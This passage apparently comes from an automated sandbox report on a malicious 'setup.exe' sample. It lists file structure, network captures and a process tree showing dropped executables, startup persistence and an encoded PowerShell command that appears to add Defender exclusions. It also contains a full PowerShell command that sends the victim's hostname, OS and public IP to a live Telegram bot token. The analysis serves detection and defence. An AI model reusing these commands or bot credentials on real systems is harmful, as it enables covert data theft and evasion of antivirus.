                                    IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_IAT | 0x1d119a0 | 0x5c | .rdata
                                    IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                    IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
                                    Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                    .text | 0x1000 | 0x6b0 | 0x800 | eb0594d6b53cdfff17c9a6a95890d294 | False | 0.4287109375 | data | 4.8527305351991865 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                    .rdata | 0x2000 | 0x1d0fb64 | 0x1d0fc00 | 609f033012c02a38a48c6fb9be86635b | unknown | unknown | unknown | unknown | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    .bss | 0x1d12000 | 0x4 | 0x0 | d41d8cd98f00b204e9800998ecf8427e | False | 0 | empty | 0.0 | IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                    .rsrc | 0x1d13000 | 0x2d390 | 0x2d400 | 2679d5256ec5c4f0af633c89e3a44599 | False | 0.26409810946132595 | data | 4.303365423073692 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                    Name | RVA | Size | Type | Language | Country | ZLIB Complexity
                                    RT_ICON | 0x1d132c8 | 0x468 | Device independent bitmap graphic, 16 x 32 x 32, image size 1024, resolution 3779 x 3779 px/m | English | United States | 0.42109929078014185
                                    RT_ICON | 0x1d13730 | 0x988 | Device independent bitmap graphic, 24 x 48 x 32, image size 2304, resolution 3779 x 3779 px/m | English | United States | 0.3454918032786885
                                    RT_ICON | 0x1d140b8 | 0x10a8 | Device independent bitmap graphic, 32 x 64 x 32, image size 4096, resolution 3779 x 3779 px/m | English | United States | 0.3018292682926829
                                    RT_ICON | 0x1d15160 | 0x25a8 | Device independent bitmap graphic, 48 x 96 x 32, image size 9216, resolution 3779 x 3779 px/m | English | United States | 0.22562240663900415
                                    RT_ICON | 0x1d17708 | 0x4228 | Device independent bitmap graphic, 64 x 128 x 32, image size 16384, resolution 3779 x 3779 px/m | English | United States | 0.1877066603684459
                                    RT_ICON | 0x1d1b930 | 0x5488 | Device independent bitmap graphic, 72 x 144 x 32, image size 20736, resolution 3779 x 3779 px/m | English | United States | 0.18553604436229204
                                    RT_ICON | 0x1d20db8 | 0x94a8 | Device independent bitmap graphic, 96 x 192 x 32, image size 36864, resolution 3779 x 3779 px/m | English | United States | 0.1577675005255413
                                    RT_ICON | 0x1d2a260 | 0x10828 | Device independent bitmap graphic, 128 x 256 x 32, image size 65536, resolution 3779 x 3779 px/m | English | United States | 0.1355879569383651
                                    RT_ICON | 0x1d3aa88 | 0x538b | PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced | English | United States | 0.9974751016972927
                                    RT_GROUP_ICON | 0x1d3fe18 | 0x84 | data | English | United States | 0.7121212121212122
                                    RT_VERSION | 0x1d3fea0 | 0x248 | data | English | United States | 0.488013698630137
                                    RT_MANIFEST | 0x1d400e8 | 0x2a6 | XML 1.0 document, ASCII text | English | United States | 0.46755162241887904
                                    DLL | Imports
                                    msvcrt.dll | malloc, _sleep, memset, strcmp, strcpy, getenv, sprintf, fopen, fwrite, fclose, __argc, __argv, _environ, _XcptFilter, __set_app_type, _controlfp, __getmainargs, exit
                                    shell32.dll | ShellExecuteA
                                    kernel32.dll | SetUnhandledExceptionFilter
                                    Language of compilation system | Country where language is spoken
                                    English | United States
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Dec 23, 2024 01:05:15.794821978 CET | 49730 | 443 | 192.168.2.4 | 104.26.13.205
                                    Dec 23, 2024 01:05:15.794907093 CET | 443 | 49730 | 104.26.13.205 | 192.168.2.4
                                    Dec 23, 2024 01:05:15.794992924 CET | 49730 | 443 | 192.168.2.4 | 104.26.13.205
                                    Dec 23, 2024 01:05:15.909390926 CET | 49730 | 443 | 192.168.2.4 | 104.26.13.205
                                    Dec 23, 2024 01:05:15.909432888 CET | 443 | 49730 | 104.26.13.205 | 192.168.2.4
                                    Dec 23, 2024 01:05:17.129975080 CET | 443 | 49730 | 104.26.13.205 | 192.168.2.4
                                    Dec 23, 2024 01:05:17.130280972 CET | 49730 | 443 | 192.168.2.4 | 104.26.13.205
                                    Dec 23, 2024 01:05:17.138079882 CET | 49730 | 443 | 192.168.2.4 | 104.26.13.205
                                    Dec 23, 2024 01:05:17.138115883 CET | 443 | 49730 | 104.26.13.205 | 192.168.2.4
                                    Dec 23, 2024 01:05:17.138529062 CET | 443 | 49730 | 104.26.13.205 | 192.168.2.4
                                    Dec 23, 2024 01:05:17.154654026 CET | 49730 | 443 | 192.168.2.4 | 104.26.13.205
                                    Dec 23, 2024 01:05:17.199378967 CET | 443 | 49730 | 104.26.13.205 | 192.168.2.4
                                    Dec 23, 2024 01:05:17.561839104 CET | 443 | 49730 | 104.26.13.205 | 192.168.2.4
                                    Dec 23, 2024 01:05:17.561917067 CET | 443 | 49730 | 104.26.13.205 | 192.168.2.4
                                    Dec 23, 2024 01:05:17.567040920 CET | 49730 | 443 | 192.168.2.4 | 104.26.13.205
                                    Dec 23, 2024 01:05:17.726999998 CET | 49730 | 443 | 192.168.2.4 | 104.26.13.205
                                    Dec 23, 2024 01:05:21.941200972 CET | 49734 | 443 | 192.168.2.4 | 149.154.167.220
                                    Dec 23, 2024 01:05:21.941293001 CET | 443 | 49734 | 149.154.167.220 | 192.168.2.4
                                    Dec 23, 2024 01:05:21.941373110 CET | 49734 | 443 | 192.168.2.4 | 149.154.167.220
                                    Dec 23, 2024 01:05:21.944108963 CET | 49734 | 443 | 192.168.2.4 | 149.154.167.220
                                    Dec 23, 2024 01:05:21.944144964 CET | 443 | 49734 | 149.154.167.220 | 192.168.2.4
                                    Dec 23, 2024 01:05:23.312902927 CET | 443 | 49734 | 149.154.167.220 | 192.168.2.4
                                    Dec 23, 2024 01:05:23.312980890 CET | 49734 | 443 | 192.168.2.4 | 149.154.167.220
                                    Dec 23, 2024 01:05:23.317584991 CET | 49734 | 443 | 192.168.2.4 | 149.154.167.220
                                    Dec 23, 2024 01:05:23.317611933 CET | 443 | 49734 | 149.154.167.220 | 192.168.2.4
                                    Dec 23, 2024 01:05:23.318121910 CET | 443 | 49734 | 149.154.167.220 | 192.168.2.4
                                    Dec 23, 2024 01:05:23.324533939 CET | 49734 | 443 | 192.168.2.4 | 149.154.167.220
                                    Dec 23, 2024 01:05:23.367376089 CET | 443 | 49734 | 149.154.167.220 | 192.168.2.4
                                    Dec 23, 2024 01:05:23.685858965 CET | 49734 | 443 | 192.168.2.4 | 149.154.167.220
                                    Dec 23, 2024 01:05:23.685899973 CET | 443 | 49734 | 149.154.167.220 | 192.168.2.4
                                    Dec 23, 2024 01:05:23.933274031 CET | 443 | 49734 | 149.154.167.220 | 192.168.2.4
                                    Dec 23, 2024 01:05:24.115181923 CET | 49734 | 443 | 192.168.2.4 | 149.154.167.220
                                    Dec 23, 2024 01:05:24.266578913 CET | 443 | 49734 | 149.154.167.220 | 192.168.2.4
                                    Dec 23, 2024 01:05:24.266693115 CET | 443 | 49734 | 149.154.167.220 | 192.168.2.4
                                    Dec 23, 2024 01:05:24.266817093 CET | 49734 | 443 | 192.168.2.4 | 149.154.167.220
                                    Dec 23, 2024 01:05:24.267558098 CET | 49734 | 443 | 192.168.2.4 | 149.154.167.220
                                    Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                    Dec 23, 2024 01:05:15.573893070 CET | 56279 | 53 | 192.168.2.4 | 1.1.1.1
                                    Dec 23, 2024 01:05:15.710854053 CET | 53 | 56279 | 1.1.1.1 | 192.168.2.4
                                    Dec 23, 2024 01:05:21.796813011 CET | 58998 | 53 | 192.168.2.4 | 1.1.1.1
                                    Dec 23, 2024 01:05:21.934802055 CET | 53 | 58998 | 1.1.1.1 | 192.168.2.4
                                    Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                    Dec 23, 2024 01:05:15.573893070 CET | 192.168.2.4 | 1.1.1.1 | 0x67e0 | Standard query (0) | api.ipify.org | A (IP address) | IN (0x0001) | false
                                    Dec 23, 2024 01:05:21.796813011 CET | 192.168.2.4 | 1.1.1.1 | 0xa7c7 | Standard query (0) | api.telegram.org | A (IP address) | IN (0x0001) | false
                                    Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                    Dec 23, 2024 01:05:15.710854053 CET | 1.1.1.1 | 192.168.2.4 | 0x67e0 | No error (0) | api.ipify.org | | 104.26.13.205 | A (IP address) | IN (0x0001) | false
                                    Dec 23, 2024 01:05:15.710854053 CET | 1.1.1.1 | 192.168.2.4 | 0x67e0 | No error (0) | api.ipify.org | | 104.26.12.205 | A (IP address) | IN (0x0001) | false
                                    Dec 23, 2024 01:05:15.710854053 CET | 1.1.1.1 | 192.168.2.4 | 0x67e0 | No error (0) | api.ipify.org | | 172.67.74.152 | A (IP address) | IN (0x0001) | false
                                    Dec 23, 2024 01:05:21.934802055 CET | 1.1.1.1 | 192.168.2.4 | 0xa7c7 | No error (0) | api.telegram.org | | 149.154.167.220 | A (IP address) | IN (0x0001) | false
                                    • api.ipify.org
                                    • api.telegram.org
                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    0 | 192.168.2.4 | 49730 | 104.26.13.205 | 443 | 7524 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    2024-12-23 00:05:17 UTC | 170 | OUT | GET /?format=text HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                    Host: api.ipify.org
                                    Connection: Keep-Alive
                                    2024-12-23 00:05:17 UTC | 424 | IN | HTTP/1.1 200 OK
                                    Date: Mon, 23 Dec 2024 00:05:17 GMT
                                    Content-Type: text/plain
                                    Content-Length: 12
                                    Connection: close
                                    Vary: Origin
                                    cf-cache-status: DYNAMIC
                                    Server: cloudflare
                                    CF-RAY: 8f64195fbeb6433f-EWR
                                    server-timing: cfL4;desc="?proto=TCP&rtt=1670&min_rtt=1656&rtt_var=631&sent=5&recv=7&lost=0&retrans=0&sent_bytes=2820&recv_bytes=784&delivery_rate=1763285&cwnd=219&unsent_bytes=0&cid=b1942cbc8cdf2056&ts=446&x=0"
                                    2024-12-23 00:05:17 UTC | 12 | IN | Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39
                                    Data Ascii: 8.46.123.189


                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                    1 | 192.168.2.4 | 49734 | 149.154.167.220 | 443 | 8104 | C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Timestamp | Bytes transferred | Direction | Data
                                    2024-12-23 00:05:23 UTC | 315 | OUT | POST /bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessage HTTP/1.1
                                    User-Agent: Mozilla/5.0 (Windows NT; Windows NT 10.0; en-US) WindowsPowerShell/5.1.19041.1682
                                    Content-Type: application/x-www-form-urlencoded
                                    Host: api.telegram.org
                                    Content-Length: 260
                                    Expect: 100-continue
                                    Connection: Keep-Alive
                                    2024-12-23 00:05:23 UTC | 260 | OUT | Data Raw: 63 68 61 74 5f 69 64 3d 36 37 33 34 39 38 35 37 30 35 26 74 65 78 74 3d 2b 25 34 30 4e 65 77 2b 44 65 76 69 63 65 2b 49 6e 66 65 63 74 65 64 21 21 21 25 32 43 2b 2b 49 6e 66 6f 72 6d 61 74 69 6f 6e 25 33 41 2b 44 61 74 65 25 33 41 2b 32 30 32 34 2d 31 32 2d 32 32 2b 31 39 25 33 41 30 35 25 33 41 35 31 25 32 43 2b 2b 48 6f 73 74 6e 61 6d 65 25 33 41 2b 4a 4f 4e 45 53 2d 50 43 25 32 43 2b 4f 53 25 33 41 2b 2b 57 69 6e 33 32 4e 54 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 2b 31 30 2e 30 2e 31 39 30 34 35 2e 30 2b 4d 69 63 72 6f 73 6f 66 74 2b 57 69 6e 64 6f 77 73 2b 4e 54 2b 31 30 2e 30 2e 31 39 30 34 35 2e 30 25 32 43 2b 2b 41 72 63 68 69 74 65 63 74 75 72 65 25 33 41 2b 36 34 2d 62 69 74 25 32 43 2b 2b 50 75 62 6c 69 63 2b 49 50 25 33 41 2b 38 2e 34 36 2e 31 32
                                    Data Ascii: chat_id=6734985705&text=+%40New+Device+Infected!!!%2C++Information%3A+Date%3A+2024-12-22+19%3A05%3A51%2C++Hostname%3A+user-PC%2C+OS%3A++Win32NT+++++++++++++10.0.19045.0+Microsoft+Windows+NT+10.0.19045.0%2C++Architecture%3A+64-bit%2C++Public+IP%3A+8.46.12
                                    2024-12-23 00:05:23 UTC | 25 | IN | HTTP/1.1 100 Continue
                                    2024-12-23 00:05:24 UTC | 882 | IN | HTTP/1.1 200 OK
                                    Server: nginx/1.18.0
                                    Date: Mon, 23 Dec 2024 00:05:24 GMT
                                    Content-Type: application/json
                                    Content-Length: 494
                                    Connection: close
                                    Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                    Access-Control-Allow-Origin: *
                                    Access-Control-Allow-Methods: GET, POST, OPTIONS
                                    Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                    {"ok":true,"result":{"message_id":42,"from":{"id":7879910740,"is_bot":true,"first_name":"catch","username":"catch2025_bot"},"chat":{"id":6734985705,"first_name":"R","username":"cjsjdjja","type":"private"},"date":1734912323,"text":"@New Device Infected!!!, Information: Date: 2024-12-22 19:05:51, Hostname: user-PC, OS: Win32NT 10.0.19045.0 Microsoft Windows NT 10.0.19045.0, Architecture: 64-bit, Public IP: 8.46.123.189","entities":[{"offset":195,"length":12,"type":"url"}]}}


                                    Target ID:0
                                    Start time:19:05:05
                                    Start date:22/12/2024
                                    Path:C:\Users\user\Desktop\setup.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\Desktop\setup.exe"
                                    Imagebase:0x400000
                                    File size:30'661'632 bytes
                                    MD5 hash:9EE966DDFF608734B5B15CD5F1D810D8
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:low
                                    Has exited:true

                                    Target ID:1
                                    Start time:19:05:06
                                    Start date:22/12/2024
                                    Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGIAeQBxACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAGcAbgBwACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHUAZQBpACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAGMAZABmACMAPgA="
                                    Imagebase:0x620000
                                    File size:433'152 bytes
                                    MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:2
                                    Start time:19:05:06
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:3
                                    Start time:19:05:07
                                    Start date:22/12/2024
                                    Path:C:\Users\user\AppData\Local\Temp\svchost.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Users\user\AppData\Local\Temp\svchost.exe"
                                    Imagebase:0x7ff669aa0000
                                    File size:551'084 bytes
                                    MD5 hash:487267C7B1B9BB3029AD15AAF79827A2
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 100%, Joe Sandbox ML
                                    Reputation:low
                                    Has exited:true

                                    Target ID:4
                                    Start time:19:05:08
                                    Start date:22/12/2024
                                    Path:C:\Users\user\AppData\Local\Temp\tg.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Local\Temp\tg.exe"
                                    Imagebase:0x400000
                                    File size:90'112 bytes
                                    MD5 hash:F8ECEDC88E4D2776486231D0EF0AEA5D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Yara matches:
                                    • Rule: JoeSecurity_Babadeda, Description: Yara detected Babadeda, Source: C:\Users\user\AppData\Local\Temp\tg.exe, Author: Joe Security
                                    Antivirus matches:
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 24%, ReversingLabs
                                    Reputation:low
                                    Has exited:false

                                    Target ID:5
                                    Start time:19:05:08
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:"C:\Windows\sysnative\cmd.exe" /c "C:\Users\user\AppData\Local\Temp\1BBA.tmp\1BBB.tmp\1BBC.bat C:\Users\user\AppData\Local\Temp\tg.exe"
                                    Imagebase:0x7ff6aa180000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:6
                                    Start time:19:05:08
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\conhost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                    Imagebase:0x7ff7699e0000
                                    File size:862'208 bytes
                                    MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:false

                                    Target ID:7
                                    Start time:19:05:09
                                    Start date:22/12/2024
                                    Path:C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\svchost.exe"
                                    Imagebase:0x400000
                                    File size:187'392 bytes
                                    MD5 hash:A3027B4F632E949EF06C151BD8787FAF
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 63%, ReversingLabs
                                    • Detection: 69%, Virustotal
                                    Reputation:low
                                    Has exited:true

                                    Target ID:8
                                    Start time:19:05:09
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):true
                                    Commandline:C:\Windows\system32\cmd.exe /c powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')"
                                    Imagebase:0x510000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:9
                                    Start time:19:05:09
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:powershell -Command "(Get-Date).ToString('yyyy-MM-dd HH:mm:ss')"
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:10
                                    Start time:19:05:09
                                    Start date:22/12/2024
                                    Path:C:\ProgramData\svchost\svchost.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\ProgramData\svchost\svchost.exe" --run
                                    Imagebase:0x400000
                                    File size:187'392 bytes
                                    MD5 hash:A3027B4F632E949EF06C151BD8787FAF
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Antivirus matches:
                                    • Detection: 100%, Avira
                                    • Detection: 100%, Joe Sandbox ML
                                    • Detection: 63%, ReversingLabs
                                    • Detection: 69%, Virustotal, Browse
                                    Reputation:low
                                    Has exited:false

                                    Target ID:11
                                    Start time:19:05:10
                                    Start date:22/12/2024
                                    Path:C:\Users\user\AppData\Local\Temp\client.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\Users\user\AppData\Local\Temp\client.exe"
                                    Imagebase:0x400000
                                    File size:29'830'891 bytes
                                    MD5 hash:0302EF4E965477DD225B298374C62722
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:Borland Delphi
                                    Reputation:low
                                    Has exited:false

                                    Target ID:12
                                    Start time:19:05:13
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\wbem\WmiPrvSE.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
                                    Imagebase:0x7ff693ab0000
                                    File size:496'640 bytes
                                    MD5 hash:60FF40CFD7FB8FE41EE4FE9AE5FE1C51
                                    Has elevated privileges:true
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:13
                                    Start time:19:05:13
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /c powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')"
                                    Imagebase:0x7ff6aa180000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Reputation:high
                                    Has exited:true

                                    Target ID:14
                                    Start time:19:05:13
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:powershell -Command "(Invoke-RestMethod -Uri 'https://api.ipify.org?format=text')"
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:15
                                    Start time:19:05:17
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\svchost.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                                    Imagebase:0x7ff6eef20000
                                    File size:55'320 bytes
                                    MD5 hash:B7F884C1B74A263F746EE12A5F7C9F6A
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:16
                                    Start time:19:05:18
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /c powershell -Command "$env:COMPUTERNAME"
                                    Imagebase:0x7ff6aa180000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:17
                                    Start time:19:05:18
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:powershell -Command "$env:COMPUTERNAME"
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:18
                                    Start time:19:05:18
                                    Start date:22/12/2024
                                    Path:C:\ProgramData\svchost\svchost.exe
                                    Wow64 process (32bit):true
                                    Commandline:"C:\ProgramData\svchost\svchost.exe" --run
                                    Imagebase:0x400000
                                    File size:187'392 bytes
                                    MD5 hash:A3027B4F632E949EF06C151BD8787FAF
                                    Has elevated privileges:false
                                    Has administrator privileges:false
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:19
                                    Start time:19:05:18
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /c powershell -Command "[System.Environment]::OSVersion"
                                    Imagebase:0x7ff6aa180000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:20
                                    Start time:19:05:18
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:powershell -Command "[System.Environment]::OSVersion"
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:21
                                    Start time:19:05:19
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\cmd.exe
                                    Wow64 process (32bit):false
                                    Commandline:C:\Windows\system32\cmd.exe /c powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }"
                                    Imagebase:0x7ff6aa180000
                                    File size:289'792 bytes
                                    MD5 hash:8A2122E8162DBEF04694B9C3E0B6CDEE
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:22
                                    Start time:19:05:19
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:powershell -Command "if ([System.IntPtr]::Size -eq 8) { '64-bit' } else { '32-bit' }"
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true

                                    Target ID:23
                                    Start time:19:05:20
                                    Start date:22/12/2024
                                    Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                    Wow64 process (32bit):false
                                    Commandline:powershell -Command "Invoke-RestMethod -Uri 'https://api.telegram.org/bot7879910740:AAEmpll82MOqQk9TxWSC5yK5UZ56ixr0bZQ/sendMessage' -Method POST -Body @{chat_id='6734985705' ; text=' @New Device Infected!!!, Information: Date: 2024-12-22 19:05:51, Hostname: user-PC, OS: Win32NT 10.0.19045.0 Microsoft Windows NT 10.0.19045.0, Architecture: 64-bit, Public IP: 8.46.123.189'}"
                                    Imagebase:0x7ff788560000
                                    File size:452'608 bytes
                                    MD5 hash:04029E121A0CFA5991749937DD22A1D9
                                    Has elevated privileges:true
                                    Has administrator privileges:true
                                    Programmed in:C, C++ or other language
                                    Has exited:true


                                      Execution Graph

                                      Execution Coverage:81.2%
                                      Dynamic/Decrypted Code Coverage:0%
                                      Signature Coverage:7.1%
                                      Total number of Nodes:28
                                      Total number of Limit Nodes:1

                                      Callgraph

                                      callgraph 0 Function_00401000 1 Function_00401454 2 Function_00401515 5 Function_0040149F 2->5 3 Function_004013F8 4 Function_0040108C 4->0 5->1 5->3 5->4

                                      Control-flow Graph

                                      APIs
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1776377178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1776240472.0000000000400000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1776419175.0000000000402000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1776419175.0000000000E02000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1776419175.0000000001802000.00000002.00000001.01000000.00000003.sdmp
                                      • Associated: 00000000.00000002.1780689929.0000000002113000.00000002.00000001.01000000.00000003.sdmp
                                      Joe Sandbox IDA Plugin
                                      • Snapshot File: hcaresult_0_2_400000_setup.jbxd
                                      Similarity
                                      • API ID: ExceptionFilterUnhandled__getmainargs__set_app_type_controlfpexitmemset
                                      • String ID:
                                      • API String ID: 3649950142-0

                                      Control-flow Graph

                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.1776377178.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.1776240472.0000000000400000.00000002.00000001.01000000.00000003.sdmp
